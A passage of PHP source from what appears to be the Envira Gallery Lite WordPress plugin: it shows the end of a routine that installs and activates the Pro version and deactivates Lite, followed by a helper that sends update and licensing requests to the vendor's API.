we have gotten this far, so let's install the plugin. require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php'; require_once plugin_dir_path( ENVIRA_LITE_FILE ) . 'includes/global/Installer_Skin.php'; // Create the plugin upgrader with our custom skin. $skin = new Envira_Lite_Installer_Skin(); $installer = new Plugin_Upgrader( $skin ); $installer->install( $download_url ); // Flush the cache and return the newly installed plugin basename. wp_cache_flush(); if ( $installer->plugin_info() ) { $plugin_basename = $installer->plugin_info(); $active = activate_plugin( $plugin_basename, false, false, true ); // Deactivate Lite. $plugin = plugin_basename( ENVIRA_LITE_FILE ); deactivate_plugins( $plugin ); do_action( 'envira_lite_plugin_deactivated', $plugin ); wp_send_json_success( [ 'message' => esc_html__( 'Congratulations! This site is now receiving automatic updates.', 'envira-gallery-lite' ), 'reload' => true, ] ); } } /** * Queries the remote URL via wp_remote_post and returns a json decoded response. * * @since 1.8.7 * * @param string $action The name of the $_POST action var. * @param array $body The content to retrieve from the remote URL. * @param array $headers The headers to send to the remote URL. * @param string $return_format The format for returning content from the remote URL. * @return string|bool Json decoded response on success, false on failure. */ function envira_api_remote_request( $action, $body = [], $headers = [], $return_format = 'json' ) { // Build the body of the request. $body = wp_parse_args( $body, [ 'tgm-updater-action' => $action, 'tgm-plugin-key' => '', 'tgm-updater-wp-version' => get_bloginfo( 'version' ), 'tgm-updater-referer' => site_url(), ] ); $body = http_build_query( $body, '', '&' ); // Build the headers of the request. $headers = wp_parse_args( $headers, [ 'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Length' => strlen( $body ), ] ); // Setup variable for wp_remote_post. $post = [ 'headers' => $headers, 'body' => $body, ]; // Allow us to define the api url for development. $api_url = defined( 'ENVIRA_API_URL' ) ? ENVIRA_API_URL : 'https://enviragallery.com'; // Perform the query and retrieve the response. $response = wp_remote_post( $api_url, $post ); $response_code = wp_remote_retrieve_response_code( $response ); /* log this for API issues */ $response_body = wp_remote_retrieve_body( $response ); // Bail out early if there are any errors. if ( 200 !== $response_code || is_wp_error( $response_body ) ) { return false; } // Return the json decoded content. return json_decode( $response_body ); }